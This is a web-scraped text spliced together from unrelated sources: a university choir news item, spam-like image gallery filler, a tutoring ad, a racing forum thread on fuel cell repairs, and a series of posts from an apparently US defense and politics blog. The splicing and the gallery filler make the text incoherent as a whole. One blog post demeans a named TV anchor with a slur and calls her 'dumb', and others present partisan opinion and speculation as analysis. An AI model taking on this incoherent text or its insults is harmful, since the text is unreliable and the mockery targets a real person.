“SW” sung several etnic songs from Indonesia; let’s say Menthok-menthok, Manuk Dadali, O Ina Ni Keke. Their performance is as one of the efforts of “SW” Choir to widen their cooperation network to assert YSU mission, namely to be a World Class University. As an exchange, Encik Nato from Culture division of USM revealed USM choir would visit Indonesia that is hosted by YSU in the upcoming year. (Odhi)
Fetching Tie Dye Double Dendrobium Orchid Garland Vibrant is one of beautiful designs in Flowers Collection. This designs was published in Wednesday, March 28, 2018 at 8:46 am by Flowers Collection administrator and this image / picture have resolution 350x350 Pixels.
The Images of Fetching Tie Dye Double Dendrobium Orchid Garland Vibrant hass been viewed 68 Users. this article was posted on Tie Dye Double Dendrobium Orchid Garland. This post about Tie Dye Double Dendrobium Orchid Garland, and many people good looking for about Fetching Tie Dye Double Dendrobium Orchid Garland Vibrant for the get new ideas.
If you can the Fetching Tie Dye Double Dendrobium Orchid Garland Vibrant has many other image are related, you can choose the best ideas in gallery below. so can be one your inspirations in the new designing your own. you will see more ideas of Fetching Tie Dye Double Dendrobium Orchid Garland Vibrant similar to this one below. enjoy this gallery now !
"Sophia" is a Greek word which means "wisdom, clear thinking, knowledge and good judgement", and that is precisely what defines EnglishWithSophia.
Introduce yourself and deepen into such diverse topics as Geography, Art, Social Sciences and History.
EnglishWithSophia is dedicated to foster the learning of English through the content of Social Sciences
Content and Language Integrated Learning are aimed to a wide range of people interested in languages and humanities within the conform of their own home
1. Home schoolers who want to improve both their command of English language and knowledge on geography, art or history.
3. ESL (English as a Second Language) students who are bored of seeing that their ability at speaking, reading, writing or listening does not improve as it should
In this website you will find plenty of resources and information about ESL and CLIL or visit My Shop
If you would like to do a ONE-TO-ONE SKYPE ENGLISH LESSONS with me just email me to Superprof or to in my TeachersPayTeachers store and we can book a free trial speaking class !!
Is Hartwig the Airport based company?out Western Canada?..If so they just send it to the USA,they dont do it themselves.
If Hartwig is the company out in Western Canada at an airport,they just send it to a USA company,they dont do it themselves.
Hartwig is based at the St Andrews airport in Manitoba. It's a 20min drive from where I live. They do some of the repairs themselves, at least they did the "repairs" on my old bladder.
In 2009 I bought my FV and little did I know that it had a leaky fuel cell. I brought it for repairs to Hartwig since they're so close. $450 or $500 later, I still had to assemble the fuel cell myself, they hadn't pressure tested it, and it leaked as soon as I put gas in it. And apparently I had no recourse since there was no guarantee on this type of repair.
I ended up getting a new fuel cell from Fred Clark (it's a custom one for the Lynx), which cost around $850 plus shipping and custom fees.
yea, I had a cell repaired by Hartwick. The price was a bit steep and it leaked a few weekends later.
The above post is for reference only and your results may vary. This post is not intended to reflect the views or opinions of SCCA and should not be considered an analysis or opinion of the rules written in the GCR.
No fuel bladders shall be used for more than 5 years after the date of manufacture, unless reinspected and recertified by the manufacturer at the end of this 5 year period, for a supplementary period of up to 2 years after the date of recertification not exceeding 7 years after the date of manufacture.
As I read this even if you have the bladder recertified after 5 years, the certification expires after seven regardless. Thus Frank’s 1995 fuel bladder probably ceased to be FT3 certified in 2000.
And my Mysterian M2 was racing in the USA up until 2009....in Canada 2010 till now I had to carefully clean a lot of gunk off the bladder to read the manufactured date Still impressive how long it lasted tho..1995 till 2011 I would go with FUEL SAFE again it was one of thiers.
I have had 3 Van Diemen FC cells repaired at Hartwick, all were around $450. They wrapped the bottom and 2-3 inches up the sides as they were all seeping fuel. All were ATL 2001- 2005 cells.
Random thoughts on almost anything and everything, with an emphasis on defense, intelligence, politics and national security matters..providing insight for the non-cleared world since 2005.
While the world remains focused on the U.S. debt ceiling crisis, North Korea may be preparing for another military provocation against its southern neighbor.
South Korea's Chosun Ilbo, citing recent intelligence data, reports that Pyongyang may soon launch a major military exercise along its western coast.
"... government sources say, based on information from intelligence teams, North Korea appears poised for a rare, large-scale military drill.
Government officials, who do not want to be named, say they are "observing closely" North Korean positions. But they say there are no indications the massing of military personnel appears to be anything more than a drill.
The chairman of the U.S. Joint Chiefs of Staff, Navy Admiral Michael Mullen, addressing reporters in Washington on Monday, did not make mention of the apparent preparations in North Korea for a military exercise. But the admiral did express concern that Pyongyang’s military will conduct some sort of action against the South again, at some point.
According to South Korean intel reporting, North Korea has assembled a "significant" number of troops and MiG-21 fighters at two bases along the Yellow Sea coast, along with more than 20 naval vessels.
The military build-up is in the same area where ROK forces and the North Korean military have clashed in recent years. There was a major naval engagement in 1999 that resulted in the sinking of a DPRK patrol vessel. In March of last year, one of Pyongyang's submarines torpedoed and sank a South Korean corvette, killing more than 40 sailors. And just six months later, DPRK artillery units shelled South Korea's Yeonpyeong Island, killing two soldiers, and triggering the latest standoff between the two rivals.
North Korean preparations come ahead of the annual Ulchi Freedom Guardian exercise conducted by U.S. and South Korean forces. Pyongyang has long protested the drill, claiming that it is a rehearsal for an invasion of the North. Never mind that Freedom Guardian (and its predecessor, Ulchi Focus Lens) are purely defensive in nature. Kim Jong-il will use any excuse to ratchet up tensions on the peninsula, and attempt to milk more assistance from Seoul and Washington.
While such tactics are hardly new, the reported level of North Korean military activity is highly unusual for this time of year. Traditionally, DPRK troops spend their summers engaged in "agricultural projects," trying to help eek out their country's meager harvest. Following the end of Pyongyang's annual Winter Training Cycle (December-March), military activity slows dramatically and comes to a virtual standstill during the late spring and summer.
Given North Korea's chronic shortages of food, fuel and electricity, it's rather doubtful that Kim Jong-il would authorize these preparations merely to rattle the sabre. More disturbingly, ROK intel officials claim the elder Kim and his son (designated heir Kim Jong un) recently visited DPRK naval command headquarters in Pyongyang. The Kims conducted a similar inspection of coastal artillery units last November, just hours before they opened fire on Yeonpyeong Island.
A master of brinkmanship, Kim clearly sees an opportunity on the Korean Peninsula. He believes the U.S. is pre-occupied with domestic issues and unlikely to respond forcibly to his next provocation. He is also counting on a restrained response from Seoul, similar to the one that followed the loss of the corvette and the shelling of Yeonpyeong last year. In both cases, South Korea did not respond with direct military force, and Kim Jong-il expects a similar reaction this time around.
Recent military moves in North Korea--virtually unreported in the U.S. media--remind us that the world is still a dangerous place. And that danger is multiplied by an administration which refuses to confront our adversaries.
During the current debt limit battle, we've heard several Democratic politicians vow that "any deal" will not come at the expense of the nation's seniors, or working families.
But military members, retirees and their dependents apparently don't fit in those categories, regardless of age or family status. As we noted in a recent post, there's a war on military benefits underway inside the Beltway, and the conflict has only begun.
Last week, we reported on a proposal to end subsidies to military commissaries, where most members of the armed forces buy their groceries. The subsidies (a little over $1 billion a year) allow military personnel and their dependents to buy food and other household staples at prices below civilian grocery stores. The benefit is particularly important for young enlisted members and their families who reside in high cost-of-living areas.
Without reduced prices at the commissary, more military personnel will wind up on food stamps, or other forms of assistance. While the number of troops who qualify for the federal programs remains relatively small, DoD officials reported a 25% jump in food stamp use at military commissaries between 2007 and 2009, an increase that out-paced the general population, even during dire economic times. A more recent survey by the Tulsa World found that food stamp purchases at the four base commissaries in Oklahoma climbed by 187% over the past two years.
Under various proposals now being discussed in Washington, military commissaries would be merged with base exchanges and prices would move closer to those in off-base stores. There has also been talk of providing a $400 yearly payment for military families (to compensate for rising grocery prices). Unfortunately, that subsidy won't come close to replacing the average $4,000 in yearly savings that most shoppers receive at the commissary.
But the eroding benefits don't end there. Earlier this week, Oklahoma Senator Tom Coburn unveiled a plan for $9 trillion in budget cuts, including $1 trillion from the military. While we've long admired Mr. Coburn's crusade against government waste, some of his proposed reductions make little sense, and will ultimately impact morale, welfare and military readiness. Among his suggestions:
-- Slash Military Tuition Assistance by 90%. Military members currently receive up to $4500 a year to fund their off-duty education, allowing many to earn their college degrees while in uniform. Senator Coburn says the TA program largely duplicates GI Bill benefits. Gutting TA would save almost $5 billion over a 10-year period.
Unfortunately, there are some serious drawbacks to Coburn's education plan. For starters, it would encourage more first and second-term troops to leave the service and enter college, since the GI Bill pays the highest benefits to veterans who have separated from the military.
Secondly, the Senator's assertion that TA is an ineffective recruiting and retention tool is simply wrong. Today's U.S. military is the best-educated in history and the tuition assistance program is one of the primary reasons. For example, over 90% of senior non-commissioned officers in the U.S. Air Force have at least an associate's degree, and the vast majority of those were earned while on active duty, using TA benefits.
And, you can make the case that tuition assistance is cost-effective as well. Since its inception in 2009, the Post-9-11 GI Bill has served more than 50,000 veterans, at a cost of $11.4 billion dollars. During the same period, the Pentagon spent just over $1 billion on TA, a program that benefited six times as many military members, at a fraction of the cost. To be fair, contrasting TA to the GI Bill is something of an apples-and-oranges comparison, but to dismiss the former program as inefficient and ineffective is simply mind-boggling.
-- Close on-base schools at DoD installations in the U.S. This proposal would save an estimated $10 billion over the next decade. At first, this proposal seems like a no-brainer; the 26,000 military dependents now enrolled in those schools would simply transfer to local public schools. But what if the local schools are lousy, and ill-prepared for a sudden influx of hundreds of new students? Are military parents supposed to simply sacrifice their childrens' education? Sadly, we know the answer to that one.
-- Overhaul military health care, and prevent retirees from signing up for TriCare Prime, the health insurance option with the lowest out-of-pocket costs. Coburn's proposal would save a projected $115 billion over 10 years, but retirees would pay an additional $3500 a year in additional medical expenses. That probably sounds like a bargain to many in the private sector, but it's worth remembering that the average military retiree is an E-6 with an average "take home" pension of just over $20,000 a year. Increased out-of-pocket costs will place a significant burden on the largest pool of military retirees.
Clearly, military spending must endure its share of cuts and Senator Coburn's plan is not without merit--just slightly mis-guided. Instead of merging commissary and BX functions, we'd simply shutter the exchanges, except at overseas locations. The BX's price advantage over civilian competitors has been largely erased in recent years, as the stores went upscale in their merchandising. Getting rid of the exchanges in the CONUS would more than cover the cost of subsidizing the commissaries, and providing savings that military members can really use.
In terms of education program, we'd put more emphasis on tuition assistance, encouraging more troops to earn degrees while on active duty. Even in an era of frequent deployments, it's quite possible to start--and finish--your degree in two tours (or less). At an average cost of $250-300 per credit hour, a degree earned using tuition assistance costs the taxpayer $30-40,000. Using the GI Bill (including housing allowance), the "price" for the same degree is $100,000--or more. Under our proposal, the GI Bill would stress degree completion for veterans, with elimination of the "transferability" clause for dependents.
For the Tri-Care issue, we recommend an even more radical solution: fully fund on-base health care. Many have forgotten that Tri-Care was created because Bill Clinton slashed the budget for base health care facilities and was promised illusory savings by sending dependents and retirees to off-base facilities. As a former Air Force Surgeon General later commented, the cost for many procedures in DoD hospitals was nominal, compared to civilian health care centers. He cited a simple appendectomy as a case-in-point. On-base, the tab for the surgery was (at the time) about $300--the cost for a surgical pack. If the military sends the patient downtown, the same appendectomy runs about $7,000. Multiply that by thousands of beneficiaries and procedures, and you can see why military health care costs have skyrocketed.
The Coburn plan is unlikely to pass anytime soon, but unfortunately, some of his proposals may endure. We first heard talk about gutting the TA program more than a year ago, long before the Senator raised that option publicly. It's almost certain that some of his "ideas" will eventually find their way into an eventual DoD down-sizing bill. Mr. Coburn's heart is in the right place, but he needs to adopt a smarter approach in cutting military spending.
ADDENDUM: And for what it's worth, we're still waiting for someone (other than Paul Ryan) to tackle the real budget-busters: Social Security, Medicare and Medicaid. From our perspective, it looks like military personnel (and retirees) are being asked to shoulder more cuts than the general population. But then again, the military community is a very small voting block. Go after the folks who can't hurt you at the ballot box. What a surprise.
We don't watch MSNBC very often, so I missed today's on-air exchange between anchor Contessa Brewer and Alabama Republican Congressman Mo Brooks. During a discussion about raising the debt ceiling, Ms. Brewer pointedly asked Congressman Brooks if he has a degree in economics.
Based on the response she, got it's pretty obvious that the MSNBC anchor never reviewed Brooks' biography. His response? "Why yes, I do." If Ms. Brewer had done a little bit of homework, she'd discover that Mo Brooks graduated from Duke in only three years, with a double major in political science and economics, earning highest honors in that latter subject. He later earned his law degree at the University of Alabama.
Of course, no one ever accused Contessa Brewer of being the sharpest tool in the media shed. For the record, she has a degree in broadcast journalism from Syracuse, which has one of the better programs in that particular area.
But as a J-school grad myself, I know the curriculum is (ahem) less challenging than engineering, the hard sciences or economics. So, the typical journalism graduate has vast holes in their education that must be filled through additional reading and study.
Unfortunately, most journalism school products believe that courses in "communications theory" and "investigative reporting" leaves them well-prepared to explain such complex topics as the U.S. economy. So, they're quite content to share their ignorance with the masses. That's why Contessa Brewer was trying to "educate" Congressman Brooks just before asking about his education. In her learned opinion, the country will fall into a "depression" if the debt ceiling isn't raised.
Gee, Ms. Brewer, a lot of people would say we're already in a depression, and the prospect of adding another few trillion to the national debt won't exactly help our economy.
But such points are clearly lost on TV hosts like Contessa Brewer, whom Don Imus once famously described as a fat a--. Substitute the word "dumb" for "fat" and you've got a much more accurate description.
Two scandals, very different outcomes. But in both instances, journalists (with the assistance of government personnel) obtain sensitive information. Printing or broadcasting the material could create serious security risks, both at home and abroad. Without much regard for those consequences, the material finds its way into the press, generating both shock and outrage.
But there any similarities between the two episodes. When The New York Times, The Guardian and other publications printed excerpts from the Wikileaks cables (facilitated by the theft of classified material by a U.S. Army Private), those outlets were hailed as heroes. But when the former British tabloid News of the World hacked into phone voice-mails--with the assistance of police officers--and published details, the public furor resulted in the closing of the 148-year-old paper. The scandal has sent shares of its parent (News Corp) plummeting, and just today, the company's CEO and Deputy CEO (Rupert and James Murdoch) were grilled by a British Parlimentary committee.
Is there more than a touch of hypocrisy at work here? Bret Stephens of The Wall Street Journal certainly thinks so:
In both cases, secret information, initially obtained by illegal means, was disseminated publicly by news organizations that believed the value of the information superseded the letter of the law, as well as the personal interests of those whom it would most directly affect. In both cases, fundamental questions about the lengths to which a news organization should go in pursuit of a scoop have been raised. In both cases, a dreadful human toll has been exacted: The British parents of murdered 13-year-old Milly Dowler, led to the false hope that their child might be alive because some of her voice mails were deleted after her abduction; Afghan citizens, fearful of Taliban reprisals after being exposed by WikiLeaks as U.S. informants.
Both, in short, are despicable instances of journalistic malpractice, for which some kind of price ought to be paid. So why is one a scandal, replete with arrests, resignations and parliamentary inquests, while the other is merely a controversy, with Mr. Assange's name mooted in some quarters for a Nobel Peace Prize?
The easy answer is that the news revealed by WikiLeaks was in the public interest, whereas what was disclosed by News of the World was merely of interest to the public. By this reckoning, if it's a great matter of state, and especially if it's a government secret, it's fair game. Not so if it's just so much tittle-tattle about essentially private affairs.
Of course, it also depends on which media outlet(s) are involved in the episode. If it's The New York Times, exposing a previously-classified government surveillance program, why alert the Pulitzer Committee. If it's News Corp, alert the authorities.
One final note: the American press isn't above the illegal intercept of phone calls in pursuit of a good story. We recall that both the Times and the Washington Post ran articles based on information from a Democratic activist, who monitored phone calls between then-Speaker of the House Newt Gingrich and John Boehner. And in the late 80s, a reporter from the Cincinnatti Enquirer hacked into the phone system of Chiquita Brands. Material he gleaned from the calls formed the basis for an 18-part "expose" of the company's activities in Central America.
With the pending closure of Walter Reed Army Medical Center in Washington, Deborah Joel is worried that her father may be forgotten.
For more than 20 years, the main auditorium at Walter Reed has been named for her father, Lawrence Joel, who received the Medal of Honor for Heroism in Vietnam.
In November 8, 1965 Joel was a combat medic, assigned to the 173rd Airborne Brigade which was participating in Operation Hump, near Bien Hoa. As they attempted to push the Viet Cong from defensive positions in the area, Joel's unit was ambushed by a larger enemy force. For the next 24 hours--and despite being wounded twice--Joel (then a Specialist 5) risked his life to care for scores of wounded men, saving many of them.
When his medical supplies ran out, Joel improvised a bandage from a plastic bag to cover a serious chest wound on an injured GI, preventing him from bleeding to death. Shot twice in the right leg, Specialist Joel defied orders to stay on the ground and kept going out to help his fellow soldiers. At least a dozen survivors of the battle owe their lives to Lawrence Joel and his heroism.
Specialist Joel received the CMH from President Johnson at the White House in March 1967, becoming the first living African-American recipient of that award since the Spanish-American War. Joel retired from the Army as a Sergeant First Class in 1973, after 27 years of service. He died of complications from diabetes in 1984, and received a hero's burial at Arlington National Cemetary. A few years later, the auditorium at Walter Reed was named in his honor. But there are no plans for a similar honor at the Bethesda Naval Medical Center or the new Army Community Hosptial at Fort Belvoir, which will replace Walter Reed as the primary military health care facilities in the nation's capital region.
Deborah Joel told the Washington Post that she was shocked by the decision, and the lack of an explanation from the Army.
Make no mistake: Lawrence Joel is a hero in the greatest sense of that word; a soldier who put his own life on the line to save wounded GIs. From our perspective, his place in the pantheon of America's heroes is secure, based on his service in two wars, and his intrepid actions on that fateful day in November, 1965.
But it's also worth noting that there is no guarantee that the naming of a base (or particular facility) will continue in perpetuity. There are plenty of military installations that were closed--without the name being transferred to another base or facility. For example, there are no plans to name another Army post "Fort Monroe," after the iconic base in Hampton, VA is shuttered later this fall.
We should also remember that the name of Lawrence Joel will live on long after that auditorium at Walter Reed closes its doors. Not only will Joel be memorialized as one of the the handful of brave Americans to receive the MOH, the Army has done its part to honor his legacy. You see, there's an important element missing from the WaPo account: along with the auditorium in Washington, military clinics at Fort McPherson, GA and Fort Bragg, NC are named for him, as is the street that encircles the Army hospital at Fort Campbell, KY. Additionally, the coliseum in Joel's hometown, Winston-Salem, NC, is named in his honor.
Lawrence Joel has been gone for more than a quarter-century. But as long as this nation honors and reveres its war heroes, he will never be forgotten.
Barely 24 hours after the Pentagon announced a massive security breach earlier this year, the story has all-but-disappeared from the media. True, the "hacker attack" (which resulted in the theft of more than 20,000 pages of classified documents) got some play in morning editions of the Washington Post and The New York Times--and it was the lead story last night on the CBS Evening News--but there has been remarkable little follow-up. After all, reporters, editors and producers must move on to bigger stories, like the J Lo/Marc Anthony split and Casey Anthony's impending release from jail.
Too bad, because this has all the makings of a major scandal. This much we know: earlier this year, hackers (read: foreign intelligence operatives) penetrated the secure computer network at a defense contractor and made off with some of the nation's most sensitive information. Among the material pilfered: war plans for Iraq and Afghanistan, and detailed technical information for the F-35 Joint Strike Fighter.
When the breach was announced yesterday by Deputy Defense Secretary William Lynn, he confirmed that the operation was almost certainly the work of a U.S. adversary, most likely China or Russia. That's hardly a surprise; Mr. Lynn suggested the "hackers" got their information in a limited probe, suggesting they knew exactly how to enter the network, and were looking for specific information.
But what's missing from the "official" account (and media reports) is another, equally disturbing element: the theft was, most likely, an inside job, carried out by individuals with access to the classified networks that links the Defense community, SIPRNET (which handles SECRET-level traffic), and JWICS, which carries TS/SCI data.
That assessment is based on a rather simple fact. SPIRNET and JWICS are separate from the internet. The Pentagon has spent billions wiring the world for transmitting classified information, avoiding the use of commercial networks that could be more easily targeted. DoD also invested heavily in encryption systems and security protocols that provided added layers of protection.
So, what's the easiest way to penetrate that type of system? Put a spy on the inside, with the a security clearance and ability to look for information and download it. We're hoping that arrests will be announced in a few days. But there's also the chance that the cyber-raid represented the capstone assignment for a Chinese or Russian operative. Once the data was stolen, the spy may have simply hopped onto an overseas flight and disappeared, long before we realized what happened.
In fairness, it is more difficult for spies to download information from secure computer networks--but not impossible, as illustrated by the Wikileaks scandal. All it takes is a disaffected American, or someone planted in the defense establishment, with access to machines that allow users to copy classified data to portable storage devices. Lest we forget, Bradley Manning was a mere Army private when he copied hundreds of thousands of pages of collateral-level information and sent it to Wikileaks.
From what little we know about the latest security breach, it's hard to say if the penetration occurred on SIPRNET or JWICS. War plans for on-going conflicts are often classified at the collateral level, as are some technical details for allied weapons systems. But given the sensitive technology contained in the F-35, it is possible that the penetration occurred on a Top Secret system or (God forbid), a network reserved for special access programs.
Who says you can't have entitlement reform? Certainly not Congress and the Obama Administration. True, they won't talk much about fixing Social Security, Medicare and Medicaid, but when it comes to military entitlements--we prefer the term benefits, since they were actually earned--everything is apparently fair game.
-- In one of his final speeches before leaving the Pentagon, Defense Secretary Robert Gates reiterated the need for military pension reform. Mr. Gates doesn't like the current system, which allows members of the armed forces to retire after 20 years of service and begin collecting their pension immediately.
Never mind that the typical military retiree is an E-6 who receives a little over $1600 a month, after taxes--far less than the pension check of your typical state or municipal employee, or retired CIA Director. And it's almost inevitable that Mr. Gates's successor, Leon Panetta, will take up the cause, creating some sort of "corporate" system that would grant a nominal pension after only 10 years of service--but beneficiaries wouldn't start collecting until the age of 60.
Hmmm... has anyone considered the negative impact from the loss of a tremendous recruiting tool and the loss of experienced personnel from the middle ranks? Put another way, how many military members with marketable skills will hang around for another 10 or 20 years when they can bolt for the contractor world or certain federal agencies. And, with a projected decline in recruiting (due to force reductions), it will be more difficult to fill their shoes.
-- If the retirement system overhaul isn't bad enough, the cost of military healthcare is also going up. Tri-Care co-pays are scheduled to increase under the 2012 DoD funding bill. True, the fees have remained unchanged for the past 16 years, but (as the Democrats are fond of saying), the higher co-pays will affect the most vulnerable in the military community, retirees and dependents living on fixed income.
-- Want more? How about higher costs for troops trying to earn their college degree. Colorado Congressman Mike Coffman has asked the SecDef to look at cutting the tuition assistance rate for eligible personnel, from 100% to 75%. Coffman, a retired Army reservist, believes the rate reduction would give military members more "ownership" of their higher education, forcing them to do more research in selecting schools and degree programs. Representative Coffman earned one of his college degrees using TA (as did your humble correspondent), but his proposal ignores an important fact: college tuition rates have exploded over the past 20 years, so a 25% cut in TA would force many junior enlisted members out of the education market--the very group that benefits most from the program.
-- How about higher grocery bills? The Senate Veterans Affair Committee recently passed a bill that would end subsidies for base commissaries, which currently total about $2 billion a year. And for good measure, the legislation calls on DoD to eventually merge commissaries with base exchanges, creating an on-base version of your local Wal-Mart.
Unfortunately, the commissary proposal has a number of flaws. Being able to buy groceries on post (at reduced prices) helps many military families make ends meet, particularly in high-cost-of-living areas. Without the subsidies, prices will inevitably rise, creating hardship for junior enlisted members and their dependents. According to various studies, each dollar in subsidies translates into three dollars in benefits for patrons (and the benefits are even higher for service members below the grade of E-6). Indeed, the commissary program is one of the most effective managed by DoD.
Additionally, the idea of merging commissary and BX/PX functions makes even less sense. The commissaries and exchanges have completely different business models, and merging supply chains and personnel systems (while eliminating waste) would be very, very expensive and it would take years to recoup the savings.
Besides, the proposed commissary/BX changes are nothing more than a money shuffle. Money that now subsidizes base commissaries would be shifted to a program that treats former Marines and dependents from Camp Lejeune, NC, who were exposed to hazardous drinking water for more than 30 years. As MOAA observes, victims of the water problem at Lejeune deserve treatment, but raiding the commissaries isn't the way to pay for it.
Virtually everyone who wears (or has worn) the uniform is willing to make sacrifices to get the nation's fiscal house in order. But it's dismaying to see Congress erode key military benefits, while ignoring the larger programs that threaten our fiscal solvency. But then again, the number of active duty military, dependents and retirees is relatively small, in comparison to the population as a whole. Better to go after the military crowd instead of enraging the membership base of AARP. After all, we know that members of the armed forces community don't vote, or more accurately, many of them can't vote (see next article).
For years. we've been chronicling the systematic disenfranchisement of U.S. military members (and their families), attempting to vote by absentee ballot. By various estimates, armed forces personnel and their dependents are more likely than any other group to have their votes negated by absentee ballots that arrive too late or can't be returned in time to meet state election laws.
So, why should 2010 be any different? It wasn't, according to Hans A. von Spakovsky, writing at NationalReview.com:
Members of the U.S. military and their families who were stationed overseas during the 2010 elections were disfranchised at an alarmingly high rate, according to a new report released today by the Military Voter Protection Project.
MVPP surveyed 24 states. Of the 2 million military voters covered by the report, 15.8 percent requested absentee ballots, but only 4.6 percent cast absentee ballots that were counted. This is at least partly due to the difficulty and uncertainty of the process. Both numbers were below the 2006 midterm election figures, when 5.5 percent of military and overseas voters cast absentee ballots that were counted.
MVPP also found that local election officials in 14 states and the District of Columbia failed to comply with the federal requirement that all absentee ballots must be mailed at least 45 days prior to the election. That requirement, imposed by the 2009 Military and Overseas Voter Empowerment Act (MOVE Act), was intended to ensure that voters had enough time to receive and mail back a ballot, given the long transit times for overseas mail, particularly in war zones. These failures affected more than 65,000 voters.
Most of the states did a good job counting the ballots they actually got back — the overall acceptance rate was more than 94 percent. However, there was one glaring and shameful exception: The state of New York rejected nearly one-third of all absentee ballots from military voters. Based on a combined estimate of military members who voted in person in the U.S. as well as overseas voters, MVPP concluded that the overall turnout rate of military voters was 11.6 percent. Since the turnout rate of all voters was 41.6 percent in the 2010 election, this means that military voters were 3.5 times less likely to vote than other voting-age citizens.
This is simply shameful. The very Americans who ensure our right to vote are the very ones most likely to be disenfranchised. And while some military members are apolitical, others have grown tired of the tricks and simply given up on the idea of absentee voting. It's also worth noting that many of the problems occurred in the blue states with close elections (Illinois comes to mind) a few red states--including Alaska--asked for waivers as well.
As detailed in the MVPP report, the Obama Justice Department only added to the confusion, ignoring requests for guidance on the waivers from DoD, while telling the state of Maryland that it could avoid a waiver by simply mailing out a ballot for federal races. A federal judge eventually overruled the Maryland opinion, but it was still a scramble to get a complete ballot to military personnel from the state who were serving overseas.
Assessing data from last year's election, MVPP analysts believe 2010 represented a step backward for military voters--and it's hard to disagree:
two exceptions discussed below), that percentage has been relatively small in the past. In 2006 for example, only 7 percent of military members voted in person. If a similar percentage voted in person in 2010, the total military voter participation rate for 2010 would have been 11.6 percent.
The Heritage Foundation will hold a conference on this matter July 19th in Washington. In attendance will be Admiral Edmund Giambastiani, Jr., a former Vice Chairman of the Joint Chiefs of Staff. His comments should prove illuminating, though he never said much about the issue while serving in the Pentagon. Indeed, DoD has never paid more than lip service to the issue, afraid of running afoul of Democrats in Congress and the White House.
Indeed, the military voting problem is referred to as "disenfranchisment" and not something more descriptive like "suppression." Yet, as the MVPP research team notes, how would we describe a system that produced similar voting totals among members of a minority group. Rest assured, it wouldn't be referred to as "disenfranchisement," and DOJ lawyers would already be in court, standing up for the victims.
Colonel Jeff Smiley has resigned as Commander of the Alabama National Guard's 187th Fighter Wing, but questions still remain about his status and past conduct.
According to Air Force Times and WSFA-TV in Montgomery, Smiley submitted his resignation on 21 June for "strictly personal reasons." His departure came three months after an investigation by the Alabama Guard revealed that Smiley had used his unit's F-16 aircraft for personal trips and received more than $96,000 in extra pay for unauthorized compensatory time.
National Guard Bureau officials would not say June 23 whether Smiley had been reassigned or would retire. Smiley has been in the Air Force for 31 years.
Smiley was investigated during the third year of his command after an anonymous complaint was filed with the Air Force Inspector General’s Office. After multiple investigations, four of eight allegations were deemed to have merit.
The investigation concluded Smiley accumulated excessive comp time and converted it into flight training time, for which he received nearly $96,000. The IG also found that he used government property — an F-16 — to visit family several times in 2006; neglected to conduct a semiannual climate survey of the unit for three years while he was installation commander; and improperly coerced his officers to join the National Guard Association of the United States.
A few years ago, we remember an Air Force Technical Sergeant (E-6) being court-martialled for claiming an extra $75 on a do-it-yourself move. So will Smiley face any charges for fraud or theft? Don't bet on it.
After investigators from the Alabama Army Guard found merit in four of the eight charges, Colonel Smiley received a mild letter of counseling--even by senior officer standards--from Brigadier General Paul D. Brown, Jr., commander of the state air guard.
Brown conducted the initial investigation of the allegations and found none to be substantiated. He referred to his own interpretation of the allegations in his letter to Smiley.
“By a ‘preponderance of the evidence standard,’ a recent Alabama Army National Guard Inspector General investigation has substantiated four allegations of apparent misconduct on your part,” Brown wrote. “While my own review of the allegations and available evidence lead me to conclude that the substantiated allegations are primarily of a technical nature, devoid of any malicious or fraudulent intent, I want to emphasize to you, a senior officer under my command, conditions can develop and/or exist which cast doubt on your overall judgment and create an appearance of impropriety.”
Brown went on to write that he considered “the totality of the circumstances leading up to this counseling” and concluded that he was confident that Smiley was capable of accomplishing his duties as wing commander.
But as Smiley began to feel the heat from the media and the public, he decided to step down. A graduate of Texas A&M, Smiley is said to be living in the Houston area and preparing for retirement, after a career that spans 31 years of active duty and guard service.
Back in February, Air Force Times demanded that Smiley's record be made public, wondering how he retained his job when other wing commanders have been fired for lesser offenses. Obviously, the guard does things a little differently, but it's stunning that Smiley is (apparently) walking away with an extra $96,000 in his pocket, and his pension and benefits intact.
We'll go the Times one better. Smiley should not be allowed to retire until the entire matter has been investigated by the Air Force or DoD Inspector General, with subsequent referrals for criminal prosecution, as required. As a guard officer, Colonel Smiley can be recalled to active duty, even if he is currently on terminal leave, or actually retired. One hundred thousand dollars in undeserved compensation and the misuse of government aircraft are serious offenses, serious enough to warrant a wider probe. Since the Alabama Guard is unwilling to do the job, it's time to move the matter up the chain of command.
Sadly, the Smiley case appears to be the latest example of the "different spanks" rule that is painfully evident in all Air Force components, active duty, Guard and Reserve. Too many senior officers have been allowed to skate on serious charges over the last 20 years, and that only encourages the next generation. Such behavior will continue until someone finally court-martials an Air Force general and sends them to Leavenworth. That's the kind of shock required to restore ethical standards in the USAF.
ADDENDUM: While we don't know Colonel Smiley, we've followed his career. He is one of the best pilots in the F-16 community. As a First Lieutenant at Shaw AFB, SC back in the early 80s, (not long out of RTU) he won the wing's "Top Gun" competition, bettering dozens of far more experienced Viper pilots. Later, he took top honors in two categories at the Air Force's worldwide Gunsmoke competition. Smiley is also a graduate of the USAF Weapons School and is one of only 10 pilots with more than 4,000 hours in the F-16. Regrettably, Smiley's misuse of government aircraft--and his undeserved compensation--have stained what should have been an exemplary career.
It's been a hallmark of education reform plans since the 1950s. Reduce class size in public schools, the argument goes, and student achievement will improve dramatically.
And we've been on a crusade to achieve that goal for six decades. As Larry Sand notes at City Journal, the number of public education employees has increased more than 300% since the mid-1950s, while the student population has grown by only 60%.
True, not all of the additional staffers work in the classroom. Much of the growth in our public schools has been at the administrator level, with increases in other areas as well. But even when you factor in all those additional bureaucrats, bus drivers, cafeteria workers, secretaries and security personnel, the number of teachers has also increased dramatically, producing a corresponding decrease in the average class size:
"..according to the National Center for Education Statistics, teacher-pupil ratios across the nation have diminished steadily since 1955, when the ratio of public school teachers to students was 26.9 to one. By 1970, the ratio was 22.3 to one. And by 2007, the last year for which federal government statistics are available, the ratio came down to 15.5 to one. In California, going back to 1999, the student-teacher ratio across all elementary and secondary schools was 20.9 pupils. Today, it’s 21.3—a paltry 1.9 percent increase."
But does a smaller class mean greater student achievement? According to Mr. Sand, a retired California teacher, the most famous study that advanced the "smaller-is-better" argument was conducted in Tennessee more than 20 years ago, and its methodology has been question. More recent research openly challenges that assertion:
In a 1998 study, for example, Stanford’s Caroline Hoxby found that “reductions in class size from a base of 15 to 30 students have no effect on student achievement.” In 1998, Hoover Institution senior fellow and economist Eric Hanushek released the results of his impressive review of class-size studies. Examining 277 separate studies on the effect of teacher-pupil ratios and class-size averages on student achievement, he found that 15 percent of the studies found an improvement in achievement, while 72 percent found no effect at all—and 13 percent found that reducing class size had a negative effect on achievement. While Hanushek admits that in some cases, children might benefit from a small-class environment, there is no way “to describe a priori situations where reduced class size will be beneficial.”
Mr. Sand believes the real solution may lie with slightly larger classes, taught by better teachers:
